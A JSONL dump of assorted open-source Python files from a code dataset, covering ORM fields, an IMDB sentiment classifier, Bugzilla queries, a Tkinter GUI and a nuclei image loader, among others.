+{"seq_id":"65051864","text":"\"\"\"Peewee ORM hacking\"\"\"\nimport re\n\nimport peewee\nimport playhouse\n\nimport lasagna.utils.helpers as helpers\n\n\nclass EnumField(peewee.Field):\n \"\"\"Enum field\n\n define an enum field in your model like this:\n EnumField(choices=['a', 'b', 'c'])\n \"\"\"\n db_field = 'enum'\n\n def pre_field_create(self, _):\n \"\"\"Create the enum type\"\"\"\n field = 'e_%s' % self.name\n\n self.get_database().get_conn().cursor().execute(\n 'DROP TYPE IF EXISTS %s;' % field\n )\n\n query = self.get_database().get_conn().cursor()\n tail = ', '.join([\"'%s'\"] * len(self.choices)) % tuple(self.choices)\n q = 'CREATE TYPE %s AS ENUM (%s);' % (field, tail)\n query.execute(q)\n\n def post_field_create(self, _):\n \"\"\"Once creation succeed register the enum name as field name\"\"\"\n self.db_field = 'e_%s' % self.name\n\n def __ddl_column__(self, _):\n return peewee.SQL('e_%s' % self.name)\n\n def db_value(self, value):\n if value not in self.choices:\n raise ValueError('Invalid Enum Value \"%s\"' % value)\n return str(value)\n\n\nclass DirectionField(peewee.Field):\n \"\"\"Custom database direction field (postgres custom type)\"\"\"\n db_field = 'direction'\n\n def db_value(self, value):\n return '(\"%s\", \"%s\")' % (value[0], value[1])\n\n def python_value(self, value):\n title, text = value.strip('()').split(',')\n\n title = title.strip('\"')\n text = text.strip('\"')[1:]\n return helpers.Direction(title, text)\n\n\nclass ArrayField(playhouse.postgres_ext.ArrayField):\n \"\"\"Improved peewee ArrayField\n\n As peewee does not handle correctly the indexing of array, this extending\n fix this behaviour.\n Additionnaly, it supports complex type insertion without explicit casting\n (only first level, nested aren't supported).\n \"\"\"\n parser = re.compile(r'\\(.*?\\)')\n default_index_type = None\n\n def db_value(self, value):\n def stringify(elt):\n \"\"\"Stringifies an array element\n\n If the element is a complex object it is returned as a jointure\n of its attrs\n If the element is a string, simply return as is\n \"\"\"\n if helpers.is_iterable(elt):\n return '\"(%s)\"' % ', '.join(elt)\n else:\n return str(elt)\n\n return '{%s}' % ', '.join(\n stringify(elt) for elt in super(ArrayField, self).db_value(value)\n )\n\n def python_value(self, value):\n if isinstance(value, str):\n values = [value.replace('\\\\\"', '\"')\n for value in self.parser.findall(value)]\n else:\n values = value\n\n return [self.__field.python_value(value) for value in values]\n","sub_path":"lasagna/lasagna/db/orm.py","file_name":"orm.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"627184573","text":"# sheldon woodward\n# 5/10/18\n\n\nclass Crpyto:\n def __init__(self, w_0, w_1, w_2):\n self.stack = {}\n self.word = ''\n word_length = 0\n if len(w_0) > word_length:\n word_length = len(w_0)\n if len(w_1) > word_length:\n word_length = len(w_1)\n if len(w_2) > word_length:\n word_length = len(w_2)\n\n w_0 = w_0[::-1]\n w_1 = w_1[::-1]\n w_2 = w_2[::-1]\n for i in range(word_length - len(w_0)):\n w_0 += ' '\n for i in range(word_length - len(w_1)):\n w_1 += ' '\n for i in range(word_length - len(w_2)):\n w_2 += ' '\n\n for a, b, c in zip(w_0, w_1, w_2):\n self.word += a\n self.word += b\n self.word += c\n\n self.stack[' '] = 0\n\n def solve(self):\n # print(self.word)\n self._recursive(0)\n\n def _recursive(self, index, carry=0):\n # print(str(self.stack) + ' ' + str(index))\n if not index < len(self.word) and carry == 0:\n print(self._without_space())\n return False\n if not index < len(self.word):\n return False\n\n let = self.word[index]\n new_carry = 0\n\n if let not in self.stack:\n if index % 3 != 2:\n for val in range(10):\n if val not in self._without_space().values():\n self.stack[let] = val\n # print('push: ' + str(self.stack))\n if self._recursive(index + 1, carry):\n return True\n else:\n self.stack.pop(list(self.stack.keys())[-1])\n # print(' pop: ' + str(self.stack))\n else:\n return False\n\n else:\n val = self.stack[self.word[index - 2]] + self.stack[self.word[index - 1]] + carry\n if val > 9:\n # print('CARRY: ' + str(val))\n new_carry = int(val / 10)\n val = val % 10\n if val not in self.stack.values():\n self.stack[let] = val\n # print('push: ' + str(self.stack))\n if self._recursive(index + 1, new_carry):\n return True\n else:\n self.stack.pop(list(self.stack.keys())[-1])\n # print(' pop: ' + str(self.stack))\n return False\n else:\n return False\n\n else:\n if index % 3 != 2:\n if self._recursive(index + 1, carry):\n return True\n else:\n return False\n\n else:\n val = self.stack[self.word[index - 2]] + self.stack[self.word[index - 1]] + carry\n if val > 9:\n # print('CARRY: ' + str(val))\n new_carry = int(val / 10)\n val = val % 10\n if val == self.stack[let]:\n if self._recursive(index + 1, new_carry):\n return True\n else:\n return False\n else:\n return False\n\n def _without_space(self):\n r = dict(self.stack)\n del r[' ']\n return r\n","sub_path":"send_more_money/Crypto.py","file_name":"Crypto.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"266490352","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nClass for dealing with POS data from MacMorpho.\n\"\"\"\n\nfrom ..reader import TaggerReader\n\nclass MacMorphoReader(TaggerReader):\n \"\"\"\n This class reads data from the MacMorpho corpus and turns it into a format\n readable by the neural network for the POS tagging task.\n \"\"\"\n \n def __init__(self, sentences=None, filename=None):\n \"\"\"\n 'param tagged_text: a sequence of tagged sentences. Each sentence must be a \n sequence of (token, tag) tuples. If None, the sentences are read from the \n default location.\n \"\"\"\n self.task = 'pos'\n self.rare_tag = None\n \n if sentences is not None:\n self.sentences = sentences\n else:\n self.sentences = []\n \n if filename is not None:\n with open(filename, 'rb') as f:\n for line in f:\n items = unicode(line, 'utf-8').split()\n self.sentences.append([item.split('_') for item in items])\n \n\n def get_inverse_tag_dictionary(self):\n \"\"\"\n Returns a version of the tag dictionary useful for consulting\n the meaning of the network's output.\n \"\"\"\n tuples = [(x[1], x[0]) for x in self.tag_dict.iteritems()]\n ret = dict(tuples)\n \n return ret\n \n","sub_path":"nlpnet/pos/macmorphoreader.py","file_name":"macmorphoreader.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"279672204","text":"from sys import maxsize\n\ndef matrix_mul(p, i, j, dp):\n if dp[i][j] < maxsize: return dp[i][j]\n if i == j: return 0\n q = maxsize\n for k in range(i, j):\n t = matrix_mul(p, i, k, dp) + matrix_mul(p, k + 1, j, dp) + p[i - 1] * p[k] * p[j]\n if q > t:\n s[i][j] = k\n q = t\n dp[i][j] = q\n return q\n\n\ndef parenthesize(s, i, j):\n if i == j:\n return \"A{}\".format(i)\n else:\n return \"({}{})\".format(parenthesize(s, i, s[i][j]), parenthesize(s, s[i][j] + 1, j))\n\np = [30, 35, 15, 5, 10, 20, 25]\ns, dp = [[0 for _ in range(len(p))] for _ in range(len(p))], [[maxsize for _ in range(len(p))] for _ in\n range(len(p))]\nprint(matrix_mul(p, 1, len(p) - 1, dp))\nprint(parenthesize(s, 1, len(p) - 1))\n","sub_path":"dp/matrix_mul.py","file_name":"matrix_mul.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"3389001","text":"# encoding: utf8\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('jobs', '__first__'),\n ('orgs', '__first__'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Application',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('job', models.ForeignKey(to='jobs.Job', verbose_name='job', to_field='id')),\n ('organization', models.ForeignKey(to='orgs.Organization', verbose_name='organization', to_field='id')),\n ],\n options={\n 'unique_together': set([('job', 'organization')]),\n 'verbose_name': 'application',\n 'verbose_name_plural': 'applications',\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"jobchaser/jobchaser/tracker/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"257102161","text":"INCLUDE_FIELDS = '&include_fields=id,component,classification,' \\\n 'creation_time,last_change_time,is_open,priority,' \\\n 'severity,status,summary,assigned_to,creator,resolution,' \\\n 'dupe_of,target_milestone,see_also'\n\n\ndef firefox_release_42(limit=10):\n return '&limit={}&order=Bug%20Number&' \\\n 'target_milestone=mozilla42&' \\\n 'target_milestone=Firefox%2042&' \\\n 'status=RESOLVED&status=VERIFIED&status=CLOSED&' \\\n 'query_format=advanced'.format(limit)\n\n\ndef thunderbird_releases_32_to_39(limit=10):\n return '&limit={}&&order=Bug%20Number&' \\\n 'status=RESOLVED&status=VERIFIED&status=CLOSED&' \\\n 'target_milestone=Thunderbird%2032.0&target_milestone=Thunderbird%2033.0&' \\\n 'target_milestone=Thunderbird%2034.0&target_milestone=Thunderbird%2035.0&' \\\n 'target_milestone=Thunderbird%2036.0&target_milestone=Thunderbird%2037.0&' \\\n 'target_milestone=Thunderbird%2038.0&target_milestone=Thunderbird%2039.0&' \\\n 'query_format=advanced'.format(limit)\n\n\ndef thunderbird_release_38(limit=10):\n return 'limit={}&order=Bug%20Number&' \\\n 'chfield=bug_status&' \\\n 'chfieldfrom=2015-06-11&' \\\n 'chfieldto=2016-05-31&' \\\n 'bug_status=RESOLVED&' \\\n 'bug_status=VERIFIED&' \\\n 'bug_status=CLOSED&' \\\n 'product=Thunderbird&' \\\n 'query_format=advanced'.format(limit)\n\n\ndef kde_plasma_release_5dot5(limit=10):\n return 'limit={}&order=Bug%20Number&' \\\n 'bug_status=RESOLVED&' \\\n 'resolution=FIXED&resolution=INVALID&' \\\n 'resolution=WONTFIX&resolution=LATER&' \\\n 'resolution=REMIND&resolution=WORKSFORME&' \\\n 'resolution=MOVED&resolution=UPSTREAM&' \\\n 'resolution=DOWNSTREAM&resolution=WAITINGFORINFO&' \\\n 'resolution=BACKTRACE&resolution=UNMAINTAINED&' \\\n 'chfield=bug_status&' \\\n 'chfieldfrom=2015-08-25&' \\\n 'chfieldto=2016-03-22&' \\\n 'chfieldvalue=RESOLVED&' \\\n 'known_name=Plasma5-All-Critical&' \\\n 'product=Baloo&product=Breeze&product=kde-cli-tools&product=kde-gtk-config&' \\\n 'product=kded-appmenu&product=kdeplasma-addons&product=kfontview&' \\\n 'product=khelpcenter&product=khotkeys&product=kinfocenter&product=kio-extras&' \\\n 'product=klipper&product=kmenuedit&product=knetattach&product=krunner&' \\\n 'product=ksmserver&product=ksplash&product=ksshaskpass&product=kstart&' \\\n 'product=ksysguard&product=kwin&product=kwrited&product=muon&' \\\n 'product=Plasma%20Workspace%20Wallpapers&product=plasma-mediacenter&' \\\n 'product=plasma-nm&product=plasmashell&product=Powerdevil&' \\\n 'product=systemsettings&product=Touchpad-KCM&' \\\n 'product=user-manager&query_based_on=Plasma5-All-Critical&' \\\n 'query_format=advanced'.format(limit)\n\n\n\n\n\ndef query_from_to(from_date, to_date, limit=0):\n severity = ['blocker', 'critical', 'major', 'normal', 'minor', 'trivial']\n resolution = ['FIXED', 'INVALID', 'WONTFIX', 'DUPLICATE', 'WORKSFORME', 'INCOMPLETE', 'SUPPORT', 'EXPIRED', 'MOVED']\n # product = 'Firefox%20for%20Android'\n product = 'Firefox'\n # product = 'Thunderbird'\n # product = 'Calendar'\n status = 'RESOLVED'\n\n partial_query = []\n for s in severity:\n query = Query()\n query.severity = s\n\n partial_query.append(query)\n\n for r in resolution:\n query = Query()\n query.resolution = r\n\n partial_query.append(query)\n\n q = Query()\n q.limit = limit\n q.product = product\n q.status = status\n partial_query.append(q)\n\n result = '&'.join([str(query) for query in partial_query])\n return result + '&chfieldfrom=' + from_date + '&chfieldto=' + to_date\n\n\nclass Query(object):\n\n @property\n def component(self):\n return self._component\n\n @component.setter\n def component(self, component):\n self._component = component\n\n @property\n def creation_time(self):\n return self._creation_time\n\n @creation_time.setter\n def creation_time(self, creation_time):\n self._creation_time = creation_time\n\n @property\n def last_change_time(self):\n return self._last_change_time\n\n @last_change_time.setter\n def last_change_time(self, last_change_time):\n self._last_change_time = last_change_time\n\n @property\n def status(self):\n return self._status\n\n @status.setter\n def status(self, status):\n self._status = status\n\n @property\n def product(self):\n return self._product\n\n @product.setter\n def product(self, product):\n self._product = product\n\n @property\n def severity(self):\n return self._severity\n\n @severity.setter\n def severity(self, severity):\n self._severity = severity\n\n @property\n def limit(self):\n return self._limit\n\n @limit.setter\n def limit(self, limit):\n self._limit = limit\n\n @property\n def resolution(self):\n return self._resolution\n\n @resolution.setter\n def resolution(self, resolution):\n self._resolution = resolution\n\n def __str__(self):\n criteria = [\n '{}={}'.format(key[1:], value) for (key, value) in self.__dict__.items() if value is not None\n ]\n\n criteria.sort()\n return '&'.join(criteria)\n","sub_path":"patterny/patterny/bugzilla/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":5476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"127961574","text":"\"\"\"PyTorch optimizer builders.\"\"\"\n\nimport torch\n\n\nOPTIMIZER_BUILDER_DICT = {}\n\n\ndef register_builder(func):\n \"\"\"Register optimizer builder.\"\"\"\n OPTIMIZER_BUILDER_DICT[func.__name__] = func\n return func\n\n\n@register_builder\ndef sgd(parameters, args):\n \"\"\"Build SGD.\"\"\"\n return torch.optim.SGD(\n parameters,\n lr=args.lr,\n weight_decay=args.weight_decay,\n )\n\n\n@register_builder\ndef adam(parameters, args):\n \"\"\"Build adam.\"\"\"\n return torch.optim.Adam(\n parameters,\n lr=args.lr,\n weight_decay=args.weight_decay,\n betas=(args.beta1, args.beta2),\n )\n\n\n@register_builder\ndef adadelta(parameters, args):\n \"\"\"Build adadelta.\"\"\"\n return torch.optim.Adadelta(\n parameters,\n rho=args.rho,\n eps=args.eps,\n weight_decay=args.weight_decay,\n )\n","sub_path":"espnet/optimizer/pytorch.py","file_name":"pytorch.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"229706750","text":"from parlai.core.build_data import download_models\nfrom parlai.core.params import ParlaiParser\nfrom examples.interactive import interactive\nfrom parlai.agents.language_model.language_model import LanguageModelAgent\n\n'''Interact with pre-trained model\nLanguage model trained on Opensubtitles 2018 dataset\nRun from ParlAI directory\n'''\n\nif __name__ == '__main__':\n parser = ParlaiParser(add_model_args=True)\n parser.add_argument('-d', '--display-examples', type='bool', default=False)\n LanguageModelAgent.add_cmdline_args(parser)\n parser.set_defaults(\n dict_file='models:personachat/language_model/opensubtitles2018.dict',\n sampling_mode=True,\n task='parlai.agents.local_human.local_human:LocalHumanAgent',\n model='language_model',\n model_file='models:personachat/language_model/languagemodel_esz512_hid1024_nl2.pt'\n )\n\n\n opt = parser.parse_args()\n opt['model_type'] = 'language_model' # for builder\n # build all profile memory models\n fnames = ['languagemodel_esz512_hid1024_nl2.pt',\n 'opensubtitles2018.dict']\n download_models(opt, fnames, 'personachat')\n\n interactive(opt)\n","sub_path":"projects/personachat/scripts/languagemodel_opensub2018_interactive.py","file_name":"languagemodel_opensub2018_interactive.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"326298361","text":"#!/usr/bin/env python3\n# @Time : 2018/10/8 8:25 AM\n# @Author : yuxuecheng\n# @Contact : yuxuecheng@xinluomed.com\n# @Site : \n# @File : imdb_bayes.py\n# @Software: PyCharm\n# @Description IMDB影评得分估计竞赛编码 链接:https://www.kaggle.com/c/word2vec-nlp-tutorial\n\n# 导入pandas用于读取和写入数据操作\nimport pandas as pd\n# 从bs4导入BeautifulSoup用于整理原始文本\nfrom bs4 import BeautifulSoup\n# 导入正则表达式工具包\nimport re\n# 从nltk.corpus里导入停用词列表\nfrom nltk.corpus import stopwords\n# 导入文本特性抽取器CountVectorizer与TfidfVectorizer\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\n# 从scikit-learn中导入朴素贝叶斯模型\nfrom sklearn.naive_bayes import MultinomialNB\n# 导入Pipeline用于方便搭建系统流程\nfrom sklearn.pipeline import Pipeline\n# 导入GridSearchCV用于超参数组合的网格搜索\nfrom sklearn.model_selection import GridSearchCV\n\n# 从本地读入训练和测试数据集\ntrain = pd.read_csv('../../Datasets/IMDB/labeledTrainData.tsv', delimiter='\\t')\ntest = pd.read_csv('../../Datasets/IMDB/testData.tsv', delimiter='\\t')\n\n# 查验一下前几条训练数据\nprint(train.head())\n\n# 查验一下前几条测试数据\nprint(test.head())\n\n\n# 定义review_to_text函数,完成对原始评论的三项数据预处理任务\ndef review_to_text(review, remove_stopwords):\n # 任务一:去掉html标记\n raw_text = BeautifulSoup(review, features='html').get_text()\n # 任务二:去掉非字母字符\n letters = re.sub('[^a-zA-Z]', ' ', raw_text)\n words = letters.lower().split()\n # 任务三:如果remove_words被激活,则进一步去掉评论中的停用词\n if remove_stopwords:\n stop_words = set(stopwords.words('english'))\n words = [w for w in words if w not in stop_words]\n\n # 返回每条评论经此三项预处理任务的词汇列表\n return words\n\n\n# 分别对原始训练和测试数据集上进行上述三项预处理\nX_train = []\nfor review in train['review']:\n X_train.append(' '.join(review_to_text(review, True)))\n\nX_test = []\nfor review in test['review']:\n X_test.append(' '.join(review_to_text(review, True)))\n\ny_train = train['sentiment']\n\n# 使用Pipeline搭建两组使用朴素贝叶斯模型的分类器,区别在于分别使用CountVectorizer与TfidfVectorizer对文本特征进行抽取\npip_count = Pipeline(\n [\n ('count_vec', CountVectorizer(analyzer='word')),\n ('mnb', MultinomialNB())\n ]\n)\npip_tfidf = Pipeline(\n [\n ('tfidf_vec', TfidfVectorizer(analyzer='word')),\n ('mnb', MultinomialNB())\n ]\n)\n\n# 分别配置用于模型超参数搜索的组合\nparams_count = {\n 'count_vec__binary': [True, False],\n 'count_vec__ngram_range': [(1, 1), (1, 2)],\n 'mnb__alpha': [0.1, 1.0, 10.0]\n}\nparams_tfidf = {\n 'tfidf_vec__binary': [True, False],\n 'tfidf_vec__ngram_range': [(1, 1), (1, 2)],\n 'mnb__alpha': [0.1, 1.0, 10.0]\n}\n\n# 使用采用4折交叉验证的方法对使用CountVectorizer的朴素贝叶斯模型进行并行化超参数搜索\ngs_count = GridSearchCV(pip_count, params_count, cv=4, n_jobs=-1, verbose=1)\ngs_count.fit(X_train, y_train)\n\n# 输出交叉验证中最佳的准确性得分以及超参数组合\nprint(gs_count.best_score_)\nprint(gs_count.best_params_)\n\n# 以最佳的超参数组合配置模型并对测试数据进行预测\ncount_y_predict = gs_count.predict(X_test)\n\n# 使用采用4折交叉验证的方法对使用TfidfVectorizer的朴素贝叶斯模型进行并行化超参数搜索\ngs_tfidf = GridSearchCV(pip_tfidf, params_tfidf, cv=4, n_jobs=-1, verbose=1)\ngs_tfidf.fit(X_train, y_train)\n\n# 输出交叉验证中最佳的准确性得分以及超参数组合\nprint(gs_tfidf.best_score_)\nprint(gs_tfidf.best_params_)\n\n# 以最佳的超参数组合配置模型并对测试数据进行预测\ntfidf_y_predict = gs_tfidf.predict(X_test)\n\n# 使用pandas对需要提交的数据进行格式化\nsubmission_count = pd.DataFrame(\n {\n 'id': test['id'],\n 'sentiment': count_y_predict\n }\n)\nsubmission_tfidf = pd.DataFrame(\n {\n 'id': test['id'],\n 'sentiment': tfidf_y_predict\n }\n)\n\n# 结果输出到本地硬盘\nsubmission_count.to_csv('../../Datasets/IMDB/submission_count.csv', index=False)\nsubmission_tfidf.to_csv('../../Datasets/IMDB/submission_tfidf.csv', index=False)\n\n\n\n\n\n\n\n\n\n","sub_path":"PythonMachineLearningAndKaggle/ch04/imbd/imdb_bayes.py","file_name":"imdb_bayes.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"376651751","text":"\n\n#calss header\nclass _EUROPE():\n\tdef __init__(self,): \n\t\tself.name = \"EUROPE\"\n\t\tself.definitions = [u'the continent that is to the east of the Atlantic Ocean, to the north of the Mediterranean, and to the west of Asia', u'the European Union', u'the continent of Europe without including the UK']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_europe.py","file_name":"_europe.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"514053388","text":"from selenium import webdriver\nfrom selenium.common.exceptions import NoAlertPresentException\nfrom selenium.webdriver.common.by import By\nfrom lib.pageObjects.login import login\nimport time\nclass Logout:\n def __init__(self,driver):\n self.driver = driver\n\n\n def logout(self):\n logout=self.driver.find_element(By.XPATH,\"html/body/div[3]/div/ul/li[15]/a\")\n logout.click()\n try:\n self.driver.switch_to.alert.accept()\n print('Alert occur')\n except NoAlertPresentException:\n print('No alter present')\n time.sleep(3)\n\n self.driver.close()\n\n","sub_path":"lib/pageObjects/logout.py","file_name":"logout.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"652439664","text":"from tkinter import *\n\nroot = Tk()\nprompt = StringVar()\nroot.title(\"AVATAR\")\nlabel = Label(root, fg=\"dark green\")\nlabel.pack()\n\nframe = Frame(root,background='red')\nframe.pack()\n\n# Function definition\n\n# first create the canvas\ncanvas = Canvas(height=200,width=200)\ncanvas.pack()\n\ndef Image1():\n canvas.delete(\"all\")\n image1 = PhotoImage(file = \"rapports.png\")\n canvas.create_image(0,0,anchor='nw',image=image1)\n canvas.image = image1\n\ndef Image2():\n canvas.delete(\"all\")\n image1 = PhotoImage(file = \"report.png\")\n canvas.create_image(0,0,anchor='nw',image=image1)\n canvas.image = image1\n\n#Invoking through button\nTextWindow = Label(frame,anchor = NW, justify = LEFT, bg= 'white', fg = 'blue', textvariable = prompt, width = 75, height=20)\nTextWindow.pack(side = TOP)\n\nconversationbutton = Button(frame, text='Start Conversation',width=25,fg=\"green\",command = Image1)\nconversationbutton.pack(side = RIGHT)\n\nstopbutton = Button(frame, text='Stop',width=25,fg=\"red\",command = Image2)\nstopbutton.pack(side = RIGHT)\n\nroot.mainloop()\n","sub_path":"gui/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"487962835","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# File: coco.py\n\nimport os\nimport config\nfrom nuclei import NucleiDataset\n\nfrom tensorpack.utils.timer import timed_operation\n\n\n__all__ = ['COCODetection', 'COCOMeta']\n\nCOCO_NUM_CATEGORY = 1\nconfig.NUM_CLASS = COCO_NUM_CATEGORY + 1\n\n\nclass _COCOMeta(object):\n INSTANCE_TO_BASEDIR = {\n 'stage1_train': 'stage1_train',\n 'stage1_test': 'stage1_test'\n }\n\n def valid(self):\n return hasattr(self, 'cat_names')\n\n def create(self, cat_ids, cat_names):\n \"\"\"\n cat_ids: list of ids\n cat_names: list of names\n \"\"\"\n assert not self.valid()\n assert len(cat_ids) == COCO_NUM_CATEGORY and len(cat_names) == COCO_NUM_CATEGORY\n self.cat_names = cat_names\n self.class_names = ['BG'] + self.cat_names\n\n # background has class id of 0\n self.category_id_to_class_id = {\n v: i + 1 for i, v in enumerate(cat_ids)}\n self.class_id_to_category_id = {\n v: k for k, v in self.category_id_to_class_id.items()}\n config.CLASS_NAMES = self.class_names\n\n\nCOCOMeta = _COCOMeta()\n\n\nclass COCODetection(object):\n def __init__(self, basedir, name, mode=None):\n \"\"\"\n mode: train or val\n \"\"\"\n assert name in COCOMeta.INSTANCE_TO_BASEDIR.keys(), name\n self.name = name\n # data/stage1_train\n self._imgdir = os.path.join(basedir, COCOMeta.INSTANCE_TO_BASEDIR[name])\n assert os.path.isdir(self._imgdir), self._imgdir\n\n # initialize the meta\n cat_ids = [1]\n cat_names = ['nuclei']\n if not COCOMeta.valid():\n COCOMeta.create(cat_ids, cat_names)\n else:\n assert COCOMeta.cat_names == cat_names\n \n self.coco = NucleiDataset(self._imgdir, mode)\n\n def load(self):\n \"\"\"\n Args:\n add_gt: whether to add ground truth bounding box annotations to the dicts\n add_mask: whether to also add ground truth mask\n\n Returns:\n a list of dict, each has keys including:\n 'height', 'width', 'id', 'file_name',\n and (if add_gt is True) 'boxes', 'class', 'is_crowd', and optionally\n 'segmentation'.\n \"\"\"\n with timed_operation('Load Groundtruth Boxes for {}'.format(self.name)):\n \n # list of dict, each has keys: \n #id\n #file_name: data/stage1_train/dec1764c00e8b3c4bf1fc7a2fda341279218ff894186b0c2664128348683c757/images/dec1764c00e8b3c4bf1fc7a2fda341279218ff894186b0c2664128348683c757.png\n #mask_dir: data/stage1_train/dec1764c00e8b3c4bf1fc7a2fda341279218ff894186b0c2664128348683c757/masks/\n #name: dec1764c00e8b3c4bf1fc7a2fda341279218ff894186b0c2664128348683c757\n \n # determined after load image and masks:\n #height,width\n #boxes nx4\n #class n, always >0\n #is_crowd # n\n imgs = self.coco.image_info\n \n for img in imgs:\n img['file_name'] = img['path'] # abosolute file name.\n return imgs\n\n @staticmethod\n def load_many(basedir, names, mode=None):\n \"\"\"\n Load and merges several instance files together.\n\n Returns the same format as :meth:`COCODetection.load`.\n \"\"\"\n if not isinstance(names, (list, tuple)):\n names = [names]\n ret = []\n for n in names:\n coco = COCODetection(basedir, n, mode=None)\n ret.extend(coco.load())\n return ret\n\n\nif __name__ == '__main__':\n c = COCODetection('data', 'stage1_train', 'train')\n imgs = c.load()\n print(\"#Images:\", len(imgs))\n \n c = COCODetection('data', 'stage1_train', 'val')\n imgs = c.load()\n print(\"#Images:\", len(imgs))\n","sub_path":"examples/Nuclei/coco.py","file_name":"coco.py","file_ext":"py","file_size_in_byte":3829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"199413493","text":"# __author__ = 'truongdung'\nfrom openerp import fields, models, api\nimport os\n\n\nclass GTSDebrandingConf(models.Model):\n _name = 'gts.debranding.conf'\n\n x_active = fields.Boolean(string=\"Active\")\n x_power_by = fields.Char(string=\"Power By\")\n x_logo = fields.Binary(string=\"Logo\")\n x_icon = fields.Binary(string=\"Icon\")\n x_title = fields.Char(string=\"Title\")\n x_hide_usermenu_help = fields.Boolean(string=\"Hide Help\")\n x_hide_usermenu_odoosuport = fields.Boolean(string=\"Hide Odoo Support\")\n\n @api.model\n def read_write_conf(self):\n value = self.search([('x_active', '=', True)], limit=1)\n my_conf = {}\n if len(value) > 0:\n for k in value._all_columns.keys():\n if k.find('x_') >= 0:\n if k == 'x_logo' and value[k]:\n fh = open('%s/%s' % (os.path.dirname(__file__), 'static/src/img/company_logo.gif'), 'wb')\n fh.write(value[k].decode('base64'))\n fh.close()\n elif k == 'x_icon' and value[k]:\n fh = open('%s/%s' % (os.path.dirname(__file__), 'static/src/img/favicon.ico'), 'wb')\n fh.write(value[k].decode('base64'))\n fh.close()\n my_conf[k.replace(\"x_\", \"\")] = value[k]\n f = open('%s/%s' % (os.path.dirname(__file__), 'controllers/abc.dung'), 'r+')\n all_conf = eval(f.read() or \"{}\")\n f.seek(0)\n f.truncate()\n all_conf[self.env.cr.dbname] = my_conf\n f.write(str(all_conf))\n f.close()\n\n @api.multi\n def write(self, vals):\n res = super(GTSDebrandingConf, self).write(vals)\n self.read_write_conf()\n return res\n\n @api.model\n def create(self, vals):\n res = super(GTSDebrandingConf, self).create(vals)\n self.read_write_conf()\n return res\n\nGTSDebrandingConf()\n","sub_path":"erp_digital_platform/addons/gts_debranding_conf/debranding_conf.py","file_name":"debranding_conf.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"60661229","text":"import re\nimport hashlib\nfrom werkzeug.utils import secure_filename\n\nALLOWED_EXTENSIONS = ('png', 'jpg', 'jpeg', 'shoto')\nTRANSLITERATION_DICTIONARY = {\n 'а':'a','б':'b','в':'v','г':'g','ґ':'g','д':'d',\n 'е':'e','є':'e','э':'e','ë':'yo','ж':'zh','з':'z',\n 'и':'i','ы':'y','і':'i','ї':'i','й':'i','к':'k',\n 'л':'l','м':'m','н':'n','о':'o','п':'p','р':'r',\n 'с':'s','т':'t','у':'u','ф':'f','х':'h','ц':'ts',\n 'ч':'ch','ш':'sh','щ':'shch','ь':'','ю':'iu','я':'ia'\n}\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\ndef prepare_name(name):\n temp_name = []\n trans_dict = TRANSLITERATION_DICTIONARY.keys()\n for char in name.lower():\n if char in trans_dict:\n temp_name.append(TRANSLITERATION_DICTIONARY[char])\n else:\n temp_name.append(char)\n return secure_filename(''.join(temp_name))\n\ndef getPathSegment(filename):\n m = hashlib.md5()\n m.update(filename.encode('utf-8'))\n return m.hexdigest()[:3]\n\ndef isSegment(string):\n return re.fullmatch(r'[0-9a-f]{3}', string)\n\ndef isResizedImage(filename):\n return re.fullmatch(r'.+-(?:w|h)[0-9]+\\.(?:{ext})'.format(ext='|'.join(ALLOWED_EXTENSIONS)), filename)\n\ndef getRequestedParameters(filename):\n result = {\n 'width': None,\n 'height': None\n }\n raw_params_string = re.findall(r'(?:-(?:w|h)[0-9]+)+', filename)\n if not len(raw_params_string): return False\n raw_params = 